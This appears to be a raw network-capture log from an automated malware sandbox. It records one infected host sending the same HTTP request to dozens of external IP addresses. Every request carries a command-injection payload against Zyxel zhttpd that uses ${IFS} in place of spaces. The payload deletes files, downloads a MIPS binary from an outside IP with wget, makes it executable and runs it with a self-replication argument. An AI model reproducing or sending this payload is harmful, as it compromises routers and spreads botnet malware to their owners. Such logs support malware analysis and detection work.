                                                Jan 12, 2024 18:16:13.207716942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1873192.168.2.233556648.148.100.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207734108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1874192.168.2.2345980123.156.94.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207771063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1875192.168.2.2340484184.57.114.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207796097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1876192.168.2.2339522122.71.247.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207824945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1877192.168.2.2333216188.74.32.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207864046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1878192.168.2.234932079.147.66.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207897902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1879192.168.2.234551813.226.222.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207930088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1880192.168.2.2353768193.64.137.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207946062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1881192.168.2.233435452.197.132.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207983971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1882192.168.2.2358210105.17.235.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208015919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1883192.168.2.2346568202.5.217.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208069086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1884192.168.2.2354260182.171.146.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208098888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1885192.168.2.2358150204.206.103.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208122015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1886192.168.2.2359522105.244.51.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208149910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1887192.168.2.2333126194.0.17.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208211899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1888192.168.2.2338832129.156.230.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208215952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1889192.168.2.234143249.227.147.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208265066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1890192.168.2.2340360133.237.38.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208287954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1891192.168.2.233505488.92.233.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208329916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1892192.168.2.2354312192.5.78.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208355904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1893192.168.2.2341818191.186.102.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208383083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1894192.168.2.2334524161.21.70.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208420992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1895192.168.2.2345152100.137.245.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208445072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1896192.168.2.235613871.61.185.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208477020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1897192.168.2.2350518141.71.56.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208498001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1898192.168.2.2340584174.52.226.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208535910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1899192.168.2.2359582186.229.93.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208575010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1900192.168.2.2359796110.83.154.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208611965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1901192.168.2.2343956106.128.78.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208642960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1902192.168.2.235152864.148.153.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208678961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1903192.168.2.2352238200.211.30.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208689928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1904192.168.2.234492418.116.26.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208733082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1905192.168.2.233822469.244.43.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208771944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1906192.168.2.235803040.215.83.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208791018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1907192.168.2.2354614139.33.117.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208817005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1908192.168.2.2337836144.174.118.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208853006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1909192.168.2.233846262.116.5.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208878994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1910192.168.2.2359282117.169.247.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208915949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1911192.168.2.2358890158.64.187.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208935976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1912192.168.2.233970243.90.169.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.208995104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1913192.168.2.234698631.201.88.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209023952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1914192.168.2.2345108213.41.123.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209057093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1915192.168.2.2343486219.148.232.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209103107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1916192.168.2.233945078.80.31.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209136963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1917192.168.2.235755247.117.37.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209160089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1918192.168.2.234460861.81.74.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209198952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1919192.168.2.2341108202.44.22.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209249020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1920192.168.2.2334038201.149.238.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209281921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1921192.168.2.235479477.38.53.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209296942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1922192.168.2.234452270.89.245.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209342003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1923192.168.2.2337256195.54.19.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209374905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1924192.168.2.2341252184.236.142.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209388018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1925192.168.2.2334536188.26.41.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209403992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1926192.168.2.2333760148.127.5.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209456921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1927192.168.2.235762447.87.248.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209486961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1928192.168.2.2359844207.117.157.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209513903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1929192.168.2.2352406123.220.42.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209532976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1930192.168.2.2352368113.64.133.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209587097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1931192.168.2.2343860144.168.71.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209599018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1932192.168.2.2349716118.210.139.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209636927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1933192.168.2.2337558108.104.140.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209666967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1934192.168.2.2337274105.56.253.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209698915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1935192.168.2.234448459.101.93.136443
                                                TimestampBytes transferredDirectionData
